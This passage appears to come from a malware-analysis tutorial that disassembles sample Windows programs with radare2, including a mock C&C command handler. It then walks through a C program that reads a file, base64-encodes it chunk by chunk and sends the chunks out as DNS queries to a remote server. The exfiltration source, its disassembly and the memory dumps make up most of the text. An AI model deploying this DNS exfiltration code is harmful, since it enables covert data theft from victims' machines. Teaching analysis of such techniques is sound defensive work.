| || 0x00401789 e87a1a0000 call sym.strncpy ; char *strncpy(char *dest, const char *src, size_t n)
| || 0x0040178e 488b45c0 mov rax, qword [local_40h]
| || 0x00401792 488d55bc lea rdx, [local_44h]
| || 0x00401796 4989d0 mov r8, rdx
| || 0x00401799 488d15663800. lea rdx, [0x00405006] ; "%d"
| || 0x004017a0 4889c1 mov rcx, rax
| || 0x004017a3 e8781a0000 call sym.sscanf ; int sscanf(const char *s, const char *format, ...)
| || 0x004017a8 488b45c0 mov rax, qword [local_40h]
| || 0x004017ac ba84030000 mov edx, 0x384 ; 900
| || 0x004017b1 89c1 mov ecx, eax
| || 0x004017b3 488b05ba7a00. mov rax, qword sym.imp.KERNEL32.dll_Beep ; [0x409274:8]=0x9484 reloc.KERNEL32.dll_Beep
| || 0x004017ba ffd0 call rax
| || 0x004017bc b905000000 mov ecx, 5
Then option 3 will just quit the program
| ||| ; CODE XREF from 0x0040170d (sym.processCommand)
| ||`-> 0x004017cb 807def33 cmp byte [local_11h], 0x33 ; [0x33:1]=255 ; '3' ; 51
| ||,=< 0x004017cf 750a jne 0x4017db
| ||| 0x004017d1 b900000000 mov ecx, 0
| ||| 0x004017d6 e88d1a0000 call sym.exit
And after that a simple sleep will be run.
A good exercise for you here is to create a script with the python radare2 binding
And log all the parameters passed to this function, like the following:
[0x0040165a]> afvd
arg arg_40h = 0x0060fb10 0x000000000060fb40 @.`..... (PRIVATE ) r11 (1:secret message one)
To create a record on what the CandC server is actually sending. That is commonly done in malware analysis, especially when it comes to stuff like DDOS botnets cause it may be interesting to see how the targets are evolving
In this case we see that 1 is the option, and secret message one the string.
As we can see, a MessageBox should pop with “secret message one” as its text, no mystery. But what about that mysterious function, it is your turn to (not discover, cause you already know from the code) but to explain what it does, try to use WA to edit the code and make the program go there instead.
And that it is. Let’s move to the next example
Base64 encoding/decoding in C and File exfiltration through DNS
So I guess you already know about base64. It is used to encode any kind of file inside a string/text. Comes in very handy when you want to send non text files easily over the network. Especially when dealing with protocols like HTTP when everything is ASCII and a null byte may break the thing.
In this DNS example, we can use it to encode a file and send it over the network, the thing is, that file can be a text file or any other kind of file like an image, a exe, audio file or whatever.
I use the following libs for the b64 encoding:
- https://web.mit.edu/freebsd/head/contrib/wpa/src/utils/base64.c
- https://web.mit.edu/freebsd/head/contrib/wpa/src/utils/base64.h
Pure copy and paste, you’ll probably need to import some extra libraries for the NULL and size_t variables to work, or you can just substitute them with 0’s and short ints I guess.
And the progam is this one:
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#include <conio.h>
#pragma comment(lib, "ws2_32")
#define BUFLEN 65536
#define CHUNKSIZE 25
struct dns_header
unsigned short id; // identification number
unsigned char rd :1; // recursion desired
unsigned char tc :1; // truncated message
unsigned char aa :1; // authoritive answer
unsigned char opcode :4; // purpose of message
unsigned char qr :1; // query/response flag
unsigned char rcode :4; // response code
unsigned char cd :1; // checking disabled
unsigned char ad :1; // authenticated data
unsigned char z :1; // its z! reserved
unsigned char ra :1; // recursion available
unsigned short q_count; // number of question entries
unsigned short ans_count; // number of answer entries
unsigned short auth_count; // number of authority entries
unsigned short add_count; // number of resource entries
struct question{
unsigned short type;
unsigned short tclass;
typedef struct
unsigned char *name;
struct question *ques;
} query;
void sendFile(char * file){
SOCKET sock;
SOCKADDR_IN ReceiverAddr , SrcInfo;
int slen = sizeof(ReceiverAddr) ;
int port = 53;
if (WSAStartup(MAKEWORD(2,2),&wsa) != 0){
printf("Failed. Error Code : %d",WSAGetLastError());
return 1;
printf("Could not create socket : %d" , WSAGetLastError());
ReceiverAddr.sin_family = AF_INET;
ReceiverAddr.sin_port = htons(port);
ReceiverAddr.sin_addr.s_addr = inet_addr("");
unsigned char buf[65536],*qname,*reader;
struct question *qinfo = NULL;
struct dns_header *dns = NULL;
dns = (struct dns_header *)&buf;
dns->id = (unsigned short) htons(getpid());
dns->qr = 0; //This is a query
dns->opcode = 0; //This is a standard query
dns->aa = 0; //Not Authoritative
dns->tc = 0; //This message is not truncated
dns->rd = 1; //Recursion Desired
dns->ra = 0; //Recursion not available! hey we dont have it (lol)
dns->z = 0;
dns->ad = 0;
dns->cd = 0;
dns->rcode = 0;
dns->q_count = htons(1); //we have only 1 question
dns->ans_count = 0;
dns->auth_count = 0;
dns->add_count = 0;
DWORD dwBytesRead = 0;
char ReadBuffer[CHUNKSIZE] = {0};
int err;
short totalBytesRead = 0;
int r = 0;
int i = 0;
int hFile = CreateFile(file , // file to open
GENERIC_READ, // open for read
FILE_SHARE_READ, // share for read
NULL, // default security
OPEN_EXISTING, // existing file only
int fsize = GetFileSize(hFile, NULL);
while(totalBytesRead < fsize){
ReadFile(hFile, ReadBuffer, CHUNKSIZE-1, &dwBytesRead, NULL);
char *res= base64_encode(ReadBuffer,dwBytesRead,&i);
char message[i+1];
message[0] = i;
qname =(unsigned char*)&buf[sizeof(struct dns_header)];
strncpy(qname, message, i+1);
qinfo =(struct question*)&buf[sizeof(struct dns_header) + (strlen((const char*)qname) + 1)];
qinfo->type = htons(16); // 1 == 'A', 16 == 'TXT', we ask for TXT registers
qinfo->tclass = htons(1); // 1 = INTERNET
if (sendto(sock,(char*)buf,sizeof(struct dns_header) + (strlen((const char*)qname)+1) + sizeof(struct question) , 0 , (struct SOCKADDR *) &ReceiverAddr, slen) == SOCKET_ERROR){
printf("sendto() failed with error code : %d ", WSAGetLastError());
printf("%d bytes now sent\n", totalBytesRead);
totalBytesRead += dwBytesRead;
int main()
char * file = "C:\\samples\\newfile.txt";
printf("Hello base64!, now sending: %s \n", file);
return 0;
Again, pretty similar but this time we see a combination of pieces of code we already worked with, this time with base64 encoding within.
The progam will read the newfile.txt file from disk, chunk by chunk, encoding each chunk in base64 and sending it as a DNS query to a remote server, it’ll wait 1 second between each query.
And again, sorry for this extra large output
Let’s see:
[0x00401b80]> pdf
/ (fcn) sym.sendFile 1250
| sym.sendFile (int arg_10010h, int arg_10012h, int arg_10014h, int arg_10020h, int arg_101b8h, int arg_101c0h, int arg_101c8h, int arg_101d0h, int arg_101dch, int arg_101e0h, int arg_101e4h, int arg_101e8h, int arg_101f0h, int arg_101f8h, int arg_10204h, int arg_1020ah, int arg_1020ch, int arg_10218h, int arg_10250h, int arg_30h, int arg_40h, int arg_80h);
| ; var int local_34h @ rbp-0x34
| ; var int local_30h @ rbp-0x30
| ; var int local_28h @ rbp-0x28
| ; var int local_20h @ rbp-0x20
| ; var int local_18h @ rbp-0x18
| ; var int local_14h @ rbp-0x14
| ; var int local_10h @ rbp-0x10
| ; arg int arg_10010h @ rbp+0x10010
| ; arg int arg_10012h @ rbp+0x10012
| ; arg int arg_10014h @ rbp+0x10014
| ; arg int arg_10020h @ rbp+0x10020
| ; arg int arg_101b8h @ rbp+0x101b8
| ; arg int arg_101c0h @ rbp+0x101c0
| ; arg int arg_101c8h @ rbp+0x101c8
| ; arg int arg_101d0h @ rbp+0x101d0
| ; arg int arg_101dch @ rbp+0x101dc
| ; arg int arg_101e0h @ rbp+0x101e0
| ; arg int arg_101e4h @ rbp+0x101e4
| ; arg int arg_101e8h @ rbp+0x101e8
| ; arg int arg_101f0h @ rbp+0x101f0
| ; arg int arg_101f8h @ rbp+0x101f8
| ; arg int arg_10204h @ rbp+0x10204
| ; arg int arg_1020ah @ rbp+0x1020a
| ; arg int arg_1020ch @ rbp+0x1020c
| ; arg int arg_10218h @ rbp+0x10218
| ; arg int arg_10250h @ rbp+0x10250
| ; var int local_20h_2 @ rsp+0x20
| ; var int local_28h_2 @ rsp+0x28
| ; arg int arg_30h @ rsp+0x30
| ; arg int arg_40h @ rsp+0x40
| ; arg int arg_80h @ rsp+0x80
| ; CALL XREF from 0x00402094 (sym.main)
| 0x00401b80 55 push rbp
| 0x00401b81 4155 push r13
| 0x00401b83 4154 push r12
| 0x00401b85 57 push rdi
| 0x00401b86 56 push rsi
| 0x00401b87 53 push rbx
| 0x00401b88 b898020100 mov eax, 0x10298
| 0x00401b8d e8ce190000 call fcn.00403560
| 0x00401b92 4829c4 sub rsp, rax
| 0x00401b95 488dac248000. lea rbp, [arg_80h] ; 0x80 ; 128
| 0x00401b9d 48898d500201. mov qword [arg_10250h], rcx ; [0x10250:8]=0
| 0x00401ba4 c7850c020100. mov dword [arg_1020ch], 0x10 ; 16
| 0x00401bae c78504020100. mov dword [arg_10204h], 0x35 ; '5' ; 53
| 0x00401bb8 488d85200001. lea rax, [arg_10020h] ; 0x10020
| 0x00401bbf 4889c2 mov rdx, rax
| 0x00401bc2 b902020000 mov ecx, 0x202 ; 514
| 0x00401bc7 488b05527800. mov rax, qword sym.imp.WS2_32.dll_WSAStartup ; [0x409420:8]=0x97c8 reloc.WS2_32.dll_WSAStartup
| 0x00401bce ffd0 call rax
| 0x00401bd0 85c0 test eax, eax
| ,=< 0x00401bd2 741c je 0x401bf0
| | 0x00401bd4 488b053d7800. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409418:8]=0x97b6 reloc.WS2_32.dll_WSAGetLastError
| | 0x00401bdb ffd0 call rax
| | 0x00401bdd 89c2 mov edx, eax
| | 0x00401bdf 488d0d7a3400. lea rcx, str.Failed._Error_Code_:__d ; 0x405060 ; "Failed. Error Code : %d"
| | 0x00401be6 e8fd190000 call sym.printf ; int printf(const char *format)
| ,==< 0x00401beb e962040000 jmp 0x402052
| || ; CODE XREF from 0x00401bd2 (sym.sendFile)
| |`-> 0x00401bf0 41b811000000 mov r8d, 0x11 ; 17
| | 0x00401bf6 ba02000000 mov edx, 2
| | 0x00401bfb b902000000 mov ecx, 2
| | 0x00401c00 488b05397800. mov rax, qword sym.imp.WS2_32.dll_socket ; [0x409440:8]=0x97f4 reloc.WS2_32.dll_socket
| | 0x00401c07 ffd0 call rax
| | 0x00401c09 488985f80101. mov qword [arg_101f8h], rax ; [0x101f8:8]=0
| | 0x00401c10 4883bdf80101. cmp qword [arg_101f8h], 0xffffffffffffffff
| |,=< 0x00401c18 7517 jne 0x401c31
| || 0x00401c1a 488b05f77700. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409418:8]=0x97b6 reloc.WS2_32.dll_WSAGetLastError
| || 0x00401c21 ffd0 call rax
| || 0x00401c23 89c2 mov edx, eax
| || 0x00401c25 488d0d4c3400. lea rcx, str.Could_not_create_socket_:__d ; 0x405078 ; "Could not create socket : %d"
| || 0x00401c2c e8b7190000 call sym.printf ; int printf(const char *format)
| || ; CODE XREF from 0x00401c18 (sym.sendFile)
| |`-> 0x00401c31 66c785100001. mov word [arg_10010h], 2 ; [0x10010:2]=0xfffe
| | 0x00401c3a 8b8504020100 mov eax, dword [arg_10204h] ; [0x10204:4]=0
| | 0x00401c40 0fb7c0 movzx eax, ax
| | 0x00401c43 89c1 mov ecx, eax
| | 0x00401c45 488b05dc7700. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409428:8]=0x97d6 reloc.WS2_32.dll_htons
| | 0x00401c4c ffd0 call rax
| | 0x00401c4e 668985120001. mov word [arg_10012h], ax ; [0x10012:2]=0xffff
| | 0x00401c55 488d0d393400. lea rcx, str. ; 0x405095 ; ""
| | 0x00401c5c 488b05cd7700. mov rax, qword sym.imp.WS2_32.dll_inet_addr ; [0x409430:8]=0x97de reloc.WS2_32.dll_inet_addr
| | 0x00401c63 ffd0 call rax
| | 0x00401c65 898514000100 mov dword [arg_10014h], eax ; [0x10014:4]=-1
| | 0x00401c6b 48c785f00101. mov qword [arg_101f0h], 0 ; [0x101f0:8]=0
| | 0x00401c76 48c785e80101. mov qword [arg_101e8h], 0 ; [0x101e8:8]=0
| | 0x00401c81 488d45f0 lea rax, [local_10h]
| | 0x00401c85 488985e80101. mov qword [arg_101e8h], rax ; [0x101e8:8]=0
| | 0x00401c8c e8b7190000 call sym.getpid ; int getpid(void)
| | 0x00401c91 0fb7c0 movzx eax, ax
| | 0x00401c94 89c1 mov ecx, eax
| | 0x00401c96 488b058b7700. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409428:8]=0x97d6 reloc.WS2_32.dll_htons
| | 0x00401c9d ffd0 call rax
| | 0x00401c9f 89c2 mov edx, eax
| | 0x00401ca1 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401ca8 668910 mov word [rax], dx
| | 0x00401cab 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401cb2 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| | 0x00401cb6 83e27f and edx, 0x7f
| | 0x00401cb9 885002 mov byte [rax + 2], dl
| | 0x00401cbc 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401cc3 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| | 0x00401cc7 83e287 and edx, 0xffffff87
| | 0x00401cca 885002 mov byte [rax + 2], dl
| | 0x00401ccd 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401cd4 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| | 0x00401cd8 83e2fb and edx, 0xfffffffb
| | 0x00401cdb 885002 mov byte [rax + 2], dl
| | 0x00401cde 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401ce5 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| | 0x00401ce9 83e2fd and edx, 0xfffffffd
| | 0x00401cec 885002 mov byte [rax + 2], dl
| | 0x00401cef 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401cf6 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| | 0x00401cfa 83ca01 or edx, 1
| | 0x00401cfd 885002 mov byte [rax + 2], dl
| | 0x00401d00 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401d07 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| | 0x00401d0b 83e27f and edx, 0x7f
| | 0x00401d0e 885003 mov byte [rax + 3], dl
| | 0x00401d11 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401d18 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| | 0x00401d1c 83e2bf and edx, 0xffffffbf
| | 0x00401d1f 885003 mov byte [rax + 3], dl
| | 0x00401d22 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401d29 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| | 0x00401d2d 83e2df and edx, 0xffffffdf
| | 0x00401d30 885003 mov byte [rax + 3], dl
| | 0x00401d33 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401d3a 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| | 0x00401d3e 83e2ef and edx, 0xffffffef
| | 0x00401d41 885003 mov byte [rax + 3], dl
| | 0x00401d44 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401d4b 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| | 0x00401d4f 83e2f0 and edx, 0xfffffff0
| | 0x00401d52 885003 mov byte [rax + 3], dl
| | 0x00401d55 b901000000 mov ecx, 1
| | 0x00401d5a 488b05c77600. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409428:8]=0x97d6 reloc.WS2_32.dll_htons
| | 0x00401d61 ffd0 call rax
| | 0x00401d63 89c2 mov edx, eax
| | 0x00401d65 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401d6c 66895004 mov word [rax + 4], dx
| | 0x00401d70 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401d77 66c740060000 mov word [rax + 6], 0
| | 0x00401d7d 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401d84 66c740080000 mov word [rax + 8], 0
| | 0x00401d8a 488b85e80101. mov rax, qword [arg_101e8h] ; [0x101e8:8]=0
| | 0x00401d91 66c7400a0000 mov word [rax + 0xa], 0
| | 0x00401d97 c745ec000000. mov dword [local_14h], 0
| | 0x00401d9e 48c745d00000. mov qword [local_30h], 0
| | 0x00401da6 48c745d80000. mov qword [local_28h], 0
| | 0x00401dae 48c745e00000. mov qword [local_20h], 0
| | 0x00401db6 c645e800 mov byte [local_18h], 0
| | 0x00401dba 66c7850a0201. mov word [arg_1020ah], 0 ; [0x1020a:2]=0
| | 0x00401dc3 c785e4010100. mov dword [arg_101e4h], 0 ; [0x101e4:4]=0
| | 0x00401dcd c745cc000000. mov dword [local_34h], 0
| | 0x00401dd4 48c744243000. mov qword [arg_30h], 0
| | 0x00401ddd c74424288000. mov dword [local_28h_2], 0x80 ; [0x80:4]=-1 ; 128
| | 0x00401de5 c74424200300. mov dword [local_20h_2], 3
| | 0x00401ded 41b900000000 mov r9d, 0
| | 0x00401df3 41b801000000 mov r8d, 1
| | 0x00401df9 ba00000080 mov edx, 0x80000000
| | 0x00401dfe 488b8d500201. mov rcx, qword [arg_10250h] ; [0x10250:8]=0
| | 0x00401e05 488b05447400. mov rax, qword sym.imp.KERNEL32.dll_CreateFileA ; [0x409250:8]=0x9450 reloc.KERNEL32.dll_CreateFileA ; "P\x94"
| | 0x00401e0c ffd0 call rax
| | 0x00401e0e 8985e0010100 mov dword [arg_101e0h], eax ; [0x101e0:4]=0
| | 0x00401e14 8b85e0010100 mov eax, dword [arg_101e0h] ; [0x101e0:4]=0
| | 0x00401e1a 4898 cdqe
| | 0x00401e1c ba00000000 mov edx, 0
| | 0x00401e21 4889c1 mov rcx, rax
| | 0x00401e24 488b05557400. mov rax, qword sym.imp.KERNEL32.dll_GetFileSize ; [0x409280:8]=0x94ce reloc.KERNEL32.dll_GetFileSize
| | 0x00401e2b ffd0 call rax
| | 0x00401e2d 8985dc010100 mov dword [arg_101dch], eax ; [0x101dc:4]=0
| |,=< 0x00401e33 e907020000 jmp 0x40203f
| || ; CODE XREF from 0x0040204c (sym.sendFile)
| .---> 0x00401e38 4889e0 mov rax, rsp
| :|| 0x00401e3b 4889c7 mov rdi, rax
| :|| 0x00401e3e 8b85e0010100 mov eax, dword [arg_101e0h] ; [0x101e0:4]=0
| :|| 0x00401e44 4898 cdqe
| :|| 0x00401e46 4889c1 mov rcx, rax
| :|| 0x00401e49 488d55ec lea rdx, [local_14h]
| :|| 0x00401e4d 488d45d0 lea rax, [local_30h]
| :|| 0x00401e51 48c744242000. mov qword [local_20h_2], 0
| :|| 0x00401e5a 4989d1 mov r9, rdx
| :|| 0x00401e5d 41b818000000 mov r8d, 0x18 ; 24
| :|| 0x00401e63 4889c2 mov rdx, rax
| :|| 0x00401e66 488b05537400. mov rax, qword sym.imp.KERNEL32.dll_ReadFile ; [0x4092c0:8]=0x9576 reloc.KERNEL32.dll_ReadFile ; "v\x95"
| :|| 0x00401e6d ffd0 call rax
| :|| 0x00401e6f 8b55ec mov edx, dword [local_14h]
| :|| 0x00401e72 488d4dcc lea rcx, [local_34h]
| :|| 0x00401e76 488d45d0 lea rax, [local_30h]
| :|| 0x00401e7a 4989c8 mov r8, rcx
| :|| 0x00401e7d 4889c1 mov rcx, rax
| :|| 0x00401e80 e8cbf6ffff call sym.base64_encode
| :|| 0x00401e85 4898 cdqe
| :|| 0x00401e87 488985d00101. mov qword [arg_101d0h], rax ; [0x101d0:8]=0
| :|| 0x00401e8e 8b45cc mov eax, dword [local_34h]
| :|| 0x00401e91 83c001 add eax, 1
| :|| 0x00401e94 4863d0 movsxd rdx, eax
| :|| 0x00401e97 4883ea01 sub rdx, 1
| :|| 0x00401e9b 488995c80101. mov qword [arg_101c8h], rdx ; [0x101c8:8]=0
| :|| 0x00401ea2 4863d0 movsxd rdx, eax
| :|| 0x00401ea5 4889d3 mov rbx, rdx
| :|| 0x00401ea8 be00000000 mov esi, 0
| :|| 0x00401ead 4863d0 movsxd rdx, eax
| :|| 0x00401eb0 4989d4 mov r12, rdx
| :|| 0x00401eb3 41bd00000000 mov r13d, 0
| :|| 0x00401eb9 4898 cdqe
| :|| 0x00401ebb 4883c00f add rax, 0xf
| :|| 0x00401ebf 48c1e804 shr rax, 4
| :|| 0x00401ec3 48c1e004 shl rax, 4
| :|| 0x00401ec7 e894160000 call fcn.00403560
| :|| 0x00401ecc 4829c4 sub rsp, rax
| :|| 0x00401ecf 488d442440 lea rax, [arg_40h] ; 0x40 ; '@' ; 64
| :|| 0x00401ed4 4883c000 add rax, 0
| :|| 0x00401ed8 488985c00101. mov qword [arg_101c0h], rax ; [0x101c0:8]=0
| :|| 0x00401edf 8b45cc mov eax, dword [local_34h]
| :|| 0x00401ee2 89c2 mov edx, eax
| :|| 0x00401ee4 488b85c00101. mov rax, qword [arg_101c0h] ; [0x101c0:8]=0
| :|| 0x00401eeb 8810 mov byte [rax], dl
| :|| 0x00401eed 8b45cc mov eax, dword [local_34h]
| :|| 0x00401ef0 83c001 add eax, 1
| :|| 0x00401ef3 4863c8 movsxd rcx, eax
| :|| 0x00401ef6 488b85c00101. mov rax, qword [arg_101c0h] ; [0x101c0:8]=0
| :|| 0x00401efd 4883c001 add rax, 1
| :|| 0x00401f01 488b95d00101. mov rdx, qword [arg_101d0h] ; [0x101d0:8]=0
| :|| 0x00401f08 4989c8 mov r8, rcx
| :|| 0x00401f0b 4889c1 mov rcx, rax
| :|| 0x00401f0e e8b5160000 call sym.strncpy ; char *strncpy(char *dest, const char *src, size_t n)
| :|| 0x00401f13 488d45f0 lea rax, [local_10h]
| :|| 0x00401f17 4883c00c add rax, 0xc
| :|| 0x00401f1b 488985b80101. mov qword [arg_101b8h], rax ; [0x101b8:8]=0
| :|| 0x00401f22 8b45cc mov eax, dword [local_34h]
| :|| 0x00401f25 83c001 add eax, 1
| :|| 0x00401f28 4863c8 movsxd rcx, eax
| :|| 0x00401f2b 488b95c00101. mov rdx, qword [arg_101c0h] ; [0x101c0:8]=0
| :|| 0x00401f32 488b85b80101. mov rax, qword [arg_101b8h] ; [0x101b8:8]=0
| :|| 0x00401f39 4989c8 mov r8, rcx
| :|| 0x00401f3c 4889c1 mov rcx, rax
| :|| 0x00401f3f e884160000 call sym.strncpy ; char *strncpy(char *dest, const char *src, size_t n)
| :|| 0x00401f44 488b85b80101. mov rax, qword [arg_101b8h] ; [0x101b8:8]=0
| :|| 0x00401f4b 4889c1 mov rcx, rax
| :|| 0x00401f4e e885160000 call sym.strlen ; size_t strlen(const char *s)
| :|| 0x00401f53 488d500d lea rdx, [rax + 0xd] ; 13
| :|| 0x00401f57 488d45f0 lea rax, [local_10h]
| :|| 0x00401f5b 4801d0 add rax, rdx ; '('
| :|| 0x00401f5e 488985f00101. mov qword [arg_101f0h], rax ; [0x101f0:8]=0
| :|| 0x00401f65 b910000000 mov ecx, 0x10 ; 16
| :|| 0x00401f6a 488b05b77400. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409428:8]=0x97d6 reloc.WS2_32.dll_htons
| :|| 0x00401f71 ffd0 call rax
| :|| 0x00401f73 89c2 mov edx, eax
| :|| 0x00401f75 488b85f00101. mov rax, qword [arg_101f0h] ; [0x101f0:8]=0
| :|| 0x00401f7c 668910 mov word [rax], dx
| :|| 0x00401f7f b901000000 mov ecx, 1
| :|| 0x00401f84 488b059d7400. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409428:8]=0x97d6 reloc.WS2_32.dll_htons
| :|| 0x00401f8b ffd0 call rax
| :|| 0x00401f8d 89c2 mov edx, eax
| :|| 0x00401f8f 488b85f00101. mov rax, qword [arg_101f0h] ; [0x101f0:8]=0
| :|| 0x00401f96 66895002 mov word [rax + 2], dx
| :|| 0x00401f9a 488b85b80101. mov rax, qword [arg_101b8h] ; [0x101b8:8]=0
| :|| 0x00401fa1 4889c1 mov rcx, rax
| :|| 0x00401fa4 e82f160000 call sym.strlen ; size_t strlen(const char *s)
| :|| 0x00401fa9 83c011 add eax, 0x11
| :|| 0x00401fac 4189c0 mov r8d, eax
| :|| 0x00401faf 488d45f0 lea rax, [local_10h]
| :|| 0x00401fb3 488b8df80101. mov rcx, qword [arg_101f8h] ; [0x101f8:8]=0
| :|| 0x00401fba 8b950c020100 mov edx, dword [arg_1020ch] ; [0x1020c:4]=0
| :|| 0x00401fc0 89542428 mov dword [local_28h_2], edx
| :|| 0x00401fc4 488d95100001. lea rdx, [arg_10010h] ; 0x10010
| :|| 0x00401fcb 4889542420 mov qword [local_20h_2], rdx
| :|| 0x00401fd0 41b900000000 mov r9d, 0
| :|| 0x00401fd6 4889c2 mov rdx, rax
| :|| 0x00401fd9 488b05587400. mov rax, qword sym.imp.WS2_32.dll_sendto ; [0x409438:8]=0x97ea reloc.WS2_32.dll_sendto
| :|| 0x00401fe0 ffd0 call rax
| :|| 0x00401fe2 83f8ff cmp eax, 0xffffffffffffffff
| ,====< 0x00401fe5 7521 jne 0x402008
| |:|| 0x00401fe7 488b052a7400. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409418:8]=0x97b6 reloc.WS2_32.dll_WSAGetLastError
| |:|| 0x00401fee ffd0 call rax
| |:|| 0x00401ff0 89c2 mov edx, eax
| |:|| 0x00401ff2 488d0daf3000. lea rcx, str.sendto___failed_with_error_code_:__d ; 0x4050a8 ; "sendto() failed with error code : %d "
| |:|| 0x00401ff9 e8ea150000 call sym.printf ; int printf(const char *format)
| |:|| 0x00401ffe b901000000 mov ecx, 1
| |:|| 0x00402003 e818160000 call sym.exit
| |:|| ; CODE XREF from 0x00401fe5 (sym.sendFile)
| `----> 0x00402008 0fbf850a0201. movsx eax, word [arg_1020ah] ; [0x1020a:2]=0
| :|| 0x0040200f 89c2 mov edx, eax
| :|| 0x00402011 488d0db63000. lea rcx, str.d_bytes_now_sent ; 0x4050ce ; "%d bytes now sent\n"
| :|| 0x00402018 e8cb150000 call sym.printf ; int printf(const char *format)
| :|| 0x0040201d b901000000 mov ecx, 1
| :|| 0x00402022 e879150000 call sym.sleep ; int sleep(int s)
| :|| 0x00402027 8b45ec mov eax, dword [local_14h]
| :|| 0x0040202a 89c2 mov edx, eax
| :|| 0x0040202c 0fb7850a0201. movzx eax, word [arg_1020ah] ; [0x1020a:2]=0
| :|| 0x00402033 01d0 add eax, edx
| :|| 0x00402035 6689850a0201. mov word [arg_1020ah], ax ; [0x1020a:2]=0
| :|| 0x0040203c 4889fc mov rsp, rdi
| :|| ; CODE XREF from 0x00401e33 (sym.sendFile)
| :|`-> 0x0040203f 0fbf850a0201. movsx eax, word [arg_1020ah] ; [0x1020a:2]=0
| :| 0x00402046 3985dc010100 cmp dword [arg_101dch], eax ; [0x13:4]=-1 ; 19
| `===< 0x0040204c 0f8fe6fdffff jg 0x401e38
| | ; CODE XREF from 0x00401beb (sym.sendFile)
| `--> 0x00402052 488da5180201. lea rsp, [arg_10218h] ; 0x10218
| 0x00402059 5b pop rbx
| 0x0040205a 5e pop rsi
| 0x0040205b 5f pop rdi
| 0x0040205c 415c pop r12
| 0x0040205e 415d pop r13
| 0x00402060 5d pop rbp
\ 0x00402061 c3 ret
This time we’ll focus on the read call, the base64 encode and on the sendto only cause we already know about the code and it looks very simple on the big picture.
| :|| 0x00401e63 4889c2 mov rdx, rax
| :|| 0x00401e66 488b05537400. mov rax, qword sym.imp.KERNEL32.dll_ReadFile ; [0x4092c0:8]=0x9576 reloc.KERNEL32.dll_ReadFile ; "v\x95"
| :|| 0x00401e6d ffd0 call rax
| :|| 0x00401e6f 8b55ec mov edx, dword [local_14h]
| :|| 0x00401e72 488d4dcc lea rcx, [local_34h]
| :|| 0x00401e76 488d45d0 lea rax, [local_30h]
| :|| 0x00401e7a 4989c8 mov r8, rcx
| :|| 0x00401e7d b 4889c1 mov rcx, rax
| :|| 0x00401e80 e8cbf6ffff call sym.base64_encode
| :|| 0x00401e85 b 4898 cdqe
| :|| 0x00401e87 488985d00101. mov qword [arg_101d0h], rax ; [0x101d0:8]=0
Then the encoding will be done, and the buffer will be moved to another one for the sendto()
[0x00401e7d]> pxw @ 0x0060fb70
0x0060fb70 0x65726f4c 0x7069206d 0x206d7573 0x6f6c6f64 Lorem ipsum dolo
0x0060fb80 0x69732072 0x6d612074 0x00000000 0x00000018 r sit am........
0x0060fb90 0x00017c09 0x00000100 0x00000000 0x00000000 .|..............
0x0060fba0 0x00000000 0x00000000 0x00000000 0x00000000 ................
Here we can see the base64 encoding on memory:
[0x00401fe0]> pxw @ 0x0060fb30
0x0060fb30 0x39475421 0x30575a79 0x42586167 0x3057647a !TG9yZW0gaXBzdW0
0x0060fb40 0x39475a67 0x49336273 0x6c326367 0x46474930 gZG9sb3Igc2l0IGF
0x0060fb50 0x00000a74 0x00000000 0x00000000 0x00000000 t...............
0x0060fb60 0x00000000 0x00000000 0x00000000 0x00000021 ............!...
0x0060fb70 0x00000000 0x7069206d 0x206d7573 0x6f6c6f64 ....m ipsum dolo
0x0060fb80 0x69732072 0x6d612074 0x00000000 0x00000018 r sit am........
0x0060fb90 0x0001fc1f 0x00000100 0x00000000 0x39475421 ............!TG9
0x0060fba0 0x30575a79 0x42586167 0x3057647a 0x39475a67 yZW0gaXBzdW0gZG9
0x0060fbb0 0x49336273 0x6c326367 0x46474930 0x00000a74 sb3Igc2l0IGFt...
0x0060fbc0 0x00010010 0x00000000 0x00000000 0x00000000 ................
DNS queries will be looking like this over the network:
00000000 1f fc 01 00 00 01 00 00 00 00 00 00 21 64 43 42 ........ ....!dCB
00000010 6b 62 32 78 76 63 6d 55 67 62 57 46 6e 62 6d 45 kb2xvcmU gbWFnbmE
